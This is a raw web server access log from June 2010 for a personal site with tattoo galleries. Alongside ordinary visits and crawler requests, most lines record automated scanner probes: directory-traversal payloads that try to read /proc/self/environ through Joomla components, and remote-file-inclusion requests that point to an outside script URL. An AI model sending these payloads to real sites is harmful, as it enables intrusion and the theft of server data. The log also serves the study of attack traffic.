72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:19 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:50:38 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:01 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:01 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:01 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:01 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:01 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:01 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:01 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:02 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:02 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:02 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
72.84.40.35 - - [01/Jun/2010:22:51:02 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100317 SeaMonkey/2.0.4"
82.99.38.11 - - [01/Jun/2010:22:52:40 -0500] "GET /logs/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.808"
82.99.38.11 - - [01/Jun/2010:22:52:40 -0500] "GET /?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
200.241.55.5 - - [01/Jun/2010:22:54:01 -0500] "GET /logs/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.808"
200.241.55.5 - - [01/Jun/2010:22:54:01 -0500] "GET /?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
82.99.38.11 - - [01/Jun/2010:22:54:48 -0500] "GET /logs/access_log.1274832000/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
82.99.38.11 - - [01/Jun/2010:22:54:48 -0500] "GET /?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
82.99.38.11 - - [01/Jun/2010:22:54:48 -0500] "GET /logs/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.808"
200.241.55.5 - - [01/Jun/2010:22:57:38 -0500] "GET /logs/access_log.1274832000/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
200.241.55.5 - - [01/Jun/2010:22:57:38 -0500] "GET /?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
200.241.55.5 - - [01/Jun/2010:22:57:38 -0500] "GET /logs/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.808"
75.72.186.241 - - [01/Jun/2010:23:01:11 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://images.google.com/#?cisearch=vintage%20tattoo""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
82.99.38.11 - - [01/Jun/2010:23:06:11 -0500] "GET /logs/access_log.1274832000/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
82.99.38.11 - - [01/Jun/2010:23:06:11 -0500] "GET /?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
82.99.38.11 - - [01/Jun/2010:23:06:12 -0500] "GET /logs/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.808"
200.241.55.5 - - [01/Jun/2010:23:07:37 -0500] "GET /logs/access_log.1274832000/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
200.241.55.5 - - [01/Jun/2010:23:07:37 -0500] "GET /?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
200.241.55.5 - - [01/Jun/2010:23:07:38 -0500] "GET /logs/?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.808"
207.46.13.98 - - [01/Jun/2010:23:09:41 -0500] "GET /logs/access_log.1198368000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.217.207 - - [01/Jun/2010:23:09:47 -0500] "GET /logs//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
174.121.217.207 - - [01/Jun/2010:23:09:47 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
174.121.58.89 - - [01/Jun/2010:23:14:42 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.89 - - [01/Jun/2010:23:14:42 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.89 - - [01/Jun/2010:23:15:10 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.90.73.48 - - [01/Jun/2010:23:15:58 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.142.68.133 - - [01/Jun/2010:23:19:44 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:19:44 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:19:47 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:19:48 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:19:51 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:19:51 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.58.89 - - [01/Jun/2010:23:21:10 -0500] "GET /logs/access_log.1273622400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.58.89 - - [01/Jun/2010:23:21:10 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.89 - - [01/Jun/2010:23:21:10 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.90.73.48 - - [01/Jun/2010:23:21:28 -0500] "GET /logs/access_log.1273622400//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
66.90.73.48 - - [01/Jun/2010:23:21:28 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.90.73.48 - - [01/Jun/2010:23:21:28 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
174.121.58.89 - - [01/Jun/2010:23:21:29 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.89 - - [01/Jun/2010:23:21:29 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.199.39 - - [01/Jun/2010:23:23:41 -0500] "GET /logs/access_log.1193356800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.39 - - [01/Jun/2010:23:23:41 -0500] "GET /logs/access_log.1265673600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.142.68.133 - - [01/Jun/2010:23:24:47 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:24:47 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:24:47 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:24:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:24:52 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:24:52 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.46.13.91 - - [01/Jun/2010:23:27:40 -0500] "GET /logs/access_log.1244851200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.251.10.117 - - [01/Jun/2010:23:30:02 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.251.10.117 - - [01/Jun/2010:23:30:03 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.204.234 - - [01/Jun/2010:23:30:23 -0500] "GET /logs/access_log.1180396800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.190.102.21 - - [01/Jun/2010:23:34:03 -0500] "GET //////accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:23:34:03 -0500] "GET /logs//////accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:23:34:03 -0500] "GET /logs/access_log.1270512000//////accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:23:34:03 -0500] "GET /logs/access_log.1262563200//////accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
174.121.217.207 - - [01/Jun/2010:23:34:32 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
174.121.217.207 - - [01/Jun/2010:23:34:32 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
174.121.217.207 - - [01/Jun/2010:23:34:32 -0500] "GET /logs//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
218.50.54.236 - - [01/Jun/2010:23:34:33 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
218.50.54.236 - - [01/Jun/2010:23:34:36 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
218.50.54.236 - - [01/Jun/2010:23:34:53 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
64.251.10.117 - - [01/Jun/2010:23:34:58 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
64.251.10.117 - - [01/Jun/2010:23:34:58 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.251.10.117 - - [01/Jun/2010:23:34:58 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [01/Jun/2010:23:35:13 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
64.251.10.117 - - [01/Jun/2010:23:35:14 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.251.10.117 - - [01/Jun/2010:23:35:14 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.142.68.133 - - [01/Jun/2010:23:36:44 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.68.133 - - [01/Jun/2010:23:36:45 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.46.195.240 - - [01/Jun/2010:23:44:40 -0500] "GET /logs/access_log.1243382400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [01/Jun/2010:23:45:10 -0500] "GET /logs/access_log.1214870400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [01/Jun/2010:23:46:45 -0500] "GET /logs/access_log.1225670400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [01/Jun/2010:23:54:30 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
59.42.10.71 - - [01/Jun/2010:23:56:17 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
61.135.134.108 - - [01/Jun/2010:23:56:23 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
209.51.171.188 - - [01/Jun/2010:23:59:48 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
209.51.171.188 - - [01/Jun/2010:23:59:48 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
61.135.134.108 - - [02/Jun/2010:00:01:43 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.79"
61.135.134.108 - - [02/Jun/2010:00:01:44 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
